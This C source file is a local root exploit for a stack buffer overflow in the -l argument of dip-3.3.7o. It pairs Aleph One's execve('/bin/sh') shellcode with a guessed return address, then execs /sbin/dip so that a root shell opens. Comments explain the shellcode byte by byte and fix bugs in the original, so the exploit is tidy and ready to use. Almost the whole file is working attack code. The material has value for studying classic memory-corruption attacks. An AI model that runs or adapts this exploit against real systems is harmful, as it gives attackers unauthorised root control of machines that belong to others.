/*# This will yield a local root shell using a stack buffer overflow in
  # dip-3.3.7o (the argument to /sbin/dip -l). If the default return
  # address misses, try offsets of about -100 to 100 as argv[1]:
  #   gcc dip-exp.c -o dipex; ./dipex [offset]
  # Vapid Labs  http://vapid.dhs.org
  # lwc@vapid.dhs.org Larry W. Cashdollar*/

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


#define LEN 130  // buffer size: number of egg bytes (shellcode + return-address fill) handed to dip's -l
#define RET 0xbffffc42  // default return address: the guessed stack address of the egg inside dip; argv[1] shifts it

char shellcode[]= /*Aleph1's shell code. */
/* Classic Linux/i386 execve("/bin/sh") shellcode (Aleph One, "Smashing the
   Stack for Fun and Profit"). Every byte is non-zero, which is what lets
   strlen()/memcpy() in main() pick it up as a string and keeps it intact
   inside the argument passed to dip. Sequence:
     jmp +0x1f / call -0x24 / pop %esi  -> %esi = address of "/bin/sh"
     mov %esi,0x8(%esi); xor %eax,%eax  -> argv[0] = path
     mov %al,0x7(%esi); mov %eax,0xc(%esi) -> NUL-terminate path, argv[1] = NULL
     mov $0xb,%al; ebx=path, ecx=argv, edx=envp(NULL); int 0x80 -> execve
     xor %ebx,%ebx; mov %ebx,%eax; inc %eax; int 0x80 -> exit(0) if execve fails */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"  /* jmp; pop %esi; build argv; %al = 11 */
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"  /* load regs; execve; start exit(0) */
"\x80\xe8\xdc\xff\xff\xff/bin/sh";                                  /* int 0x80; call back; path (NUL written at run time) */

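int main(int argc, char *argv[]) {
    /*
     * Build the "egg" handed to dip as its -l argument (the shellcode
     * followed by a run of copies of the guessed return address) and exec
     * /sbin/dip with it.
     *
     * argv[1] (optional): decimal offset subtracted from RET so the caller
     * can walk the guess up or down when the default misses; there is no NOP
     * sled, so the address has to land very close to the start of the egg.
     * Returns 1 on a malformed offset or if execl() fails; on success the
     * process image is replaced and main() never returns.
     */

    /* The target is 32-bit x86 (int 0x80 shellcode), so one saved-%eip slot
     * is 4 bytes. Using uint32_t instead of `long` keeps the fill correct
     * when this is built on an LP64 host, where `long` is 8 bytes and the
     * high zero bytes would land NULs inside the argument string. */
    uint32_t retaddr = RET;

    if (argc > 1) {
        /* strtol instead of atoi: reject garbage rather than silently
         * treating "abc" as offset 0. */
        char *end = NULL;
        errno = 0;
        long off = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "usage: %s [offset]  (offset must be a decimal integer)\n", argv[0]);
            return 1;
        }
        /* Same arithmetic as the original RET - atoi(argv[1]); a negative
         * offset moves the guess up via unsigned wraparound. */
        retaddr -= (uint32_t)off;
    }

    /* Cast so the conversion matches: the original printed a long with %x. */
    printf("Using address %lx\n", (unsigned long)retaddr);

    /* Egg layout: shellcode, then whole address words while they start
     * inside the first LEN bytes, then a NUL terminator.
     *
     * With LEN = 130 and the 45-byte shellcode that is 22 words; the last one
     * starts at offset 129 and ends at 132. The original declared only
     * buffer[LEN], so that last word spilled 3 bytes past the array and the
     * egg was never terminated, leaving execl() to read whatever followed on
     * the stack. One word of slack plus a terminator keeps the identical
     * 133-byte payload while staying in bounds. */
    char buffer[LEN + sizeof(uint32_t) + 1];
    size_t sclen = strlen(shellcode);   /* shellcode is NUL-free, so this is its full length */
    size_t i;

    memcpy(buffer, shellcode, sclen);
    for (i = sclen; i < LEN; i += sizeof(uint32_t)) {
        /* memcpy rather than *(long *)&buffer[i]: the original store was
         * misaligned and violated strict aliasing. */
        memcpy(&buffer[i], &retaddr, sizeof retaddr);
    }
    buffer[i] = '\0';

    /* Exec dip with the egg as the value of -l. The variadic sentinel has to
     * be a null pointer; the bare `0` the original passed is an int. */
    execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)NULL);

    /* Only reached if the exec failed (e.g. no /sbin/dip on this box). */
    perror("execl /sbin/dip");
    return 1;
}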

/*
                                            %ebp %eip  
  [%esp][SSSSSSSSSSSSSSSSRRRRRRRRRRRRRRRRRRR][RR][RR]
  With no NOP sled the return address has to land (almost) exactly on the
  start of the egg, which is why the offset argument exists: step it in small
  increments until the guess hits.*/
